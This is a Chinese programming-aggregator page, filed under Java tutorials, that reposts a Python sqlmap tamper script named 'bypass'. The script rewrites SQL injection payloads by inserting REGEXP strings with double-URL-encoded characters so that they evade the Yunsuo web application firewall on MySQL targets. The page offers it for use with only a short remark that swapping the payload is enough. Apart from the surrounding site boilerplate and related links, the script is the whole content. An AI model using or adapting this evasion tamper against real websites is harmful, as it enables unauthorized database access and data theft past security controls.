Java教程
bypass
本文主要是介绍bypass,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
渗透测试确实是一门艺术,需要独特的方法、坚持的决心、长期的经验以及快速学习新技术的能力。非常期待渗透过程中出现的独特挑战,并欣赏该领域的动态特性 。
*- coding: utf-8 -*
import re
import os
from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("Bypass yunsuo by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload, **kwargs):
payload=payload.replace(" "," ",1)
payload=payload.replace(" AND"," REGEXP \"[...%252523]\" and",1)
payload=re.sub(r'(ORDER BY \d+)', "x", payload)
payload=payload.replace("UNION"," REGEXP \"[...%252523]\" union",1)
payload=payload.replace("(SELECT (CASE WHEN ("," REGEXP \"[...%252523]\" (SELECT (CASE WHEN (",1)
payload=payload.replace(" AS "," REGEXP \"[...%252523]\" as ",1)
payload=payload.replace(" OR "," REGEXP \"[...%252523]\" or ",1)
payload=payload.replace(" WHERE "," REGEXP \"[...%252523]\" where ",1)
payload=payload.replace("HIGH_RISK_OPERATION:0"," REGEXP \"[...%252523]\" ",1)
payload=payload.replace(";","; REGEXP \"[...%252523]\" HTGH",1)
payload=payload.replace("||","; || REGEXP \"[...%252523]\" ",1)
payload=payload.replace("THEN"," THEN REGEXP \"[...%252523]\" ",1)
payload=payload.replace(" IN"," REGEXP \"[...%252523]\" IN ",1)
payload=payload.replace("+"," REGEXP \"[...%252523]\" + ",1)
payload=payload.replace("WHEN"," REGEXP \"[...%252523]\" ",1)
return payload
换个payload就行了,好蠢啊哈哈哈
这篇关于bypass的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
Springboot应用的多环境打包入门11-23
-
Springboot应用的生产发布入门教程11-23
-
Python编程入门指南11-23
-
Java创业入门:从零开始的编程之旅11-23
-
Java创业入门:新手必读的Java编程与创业指南11-23
-
Java对接阿里云智能语音服务入门详解11-23
-
Java对接阿里云智能语音服务入门教程11-23
-
JAVA对接阿里云智能语音服务入门教程11-23
-
Java副业入门:初学者的简单教程11-23
-
JAVA副业入门:初学者的实战指南11-23
-
JAVA项目部署入门:新手必读指南11-23
-
Java项目部署入门:新手必看指南11-23
-
Java项目部署入门:新手必读指南11-23
-
Java项目开发入门:新手必读指南11-23
-
JAVA项目开发入门:从零开始的实用教程11-23
栏目导航
